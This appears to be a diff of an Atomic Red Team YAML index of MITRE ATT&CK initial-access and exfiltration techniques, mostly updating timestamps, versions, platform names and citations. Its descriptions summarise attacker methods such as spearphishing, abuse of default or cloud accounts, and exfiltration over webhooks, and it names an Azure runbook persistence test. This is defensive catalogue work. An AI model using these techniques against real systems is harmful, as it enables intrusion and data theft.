+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59646,7 +60574,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -59663,7 +60591,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -59693,7 +60620,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59707,7 +60634,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -59770,12 +60696,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59850,7 +60775,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59864,19 +60789,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59902,7 +60826,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59957,7 +60881,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -60020,11 +60943,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -60039,6 +60961,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -60047,18 +60970,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -60090,14 +61013,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -60108,6 +61028,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -60116,22 +61041,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -60156,36 +61077,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -60214,9 +61118,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -60234,7 +61138,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -60272,11 +61180,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60293,7 +61200,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -60303,7 +61209,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60312,19 +61218,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -60372,11 +61276,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60396,10 +61301,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -60432,7 +61335,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -60471,7 +61373,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -60486,7 +61388,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -60566,11 +61467,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60626,11 +61526,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -60691,8 +61590,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -60720,13 +61619,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60766,8 +61664,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -60775,13 +61675,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -60812,9 +61712,6 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Azure Persistence Automation Runbook Created or Modified
@@ -60898,7 +61795,7 @@ initial-access:
           terraform destroy -auto-approve
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60965,11 +61862,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -61021,15 +61917,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -61053,10 +61948,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -61075,13 +61969,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -61120,9 +62013,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -61172,7 +62064,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -61192,7 +62083,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -61212,8 +62103,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -61260,7 +62149,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -61280,7 +62168,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61302,8 +62190,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -61357,7 +62243,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -61382,7 +62267,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -61417,12 +62302,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61447,11 +62330,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -61494,9 +62376,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
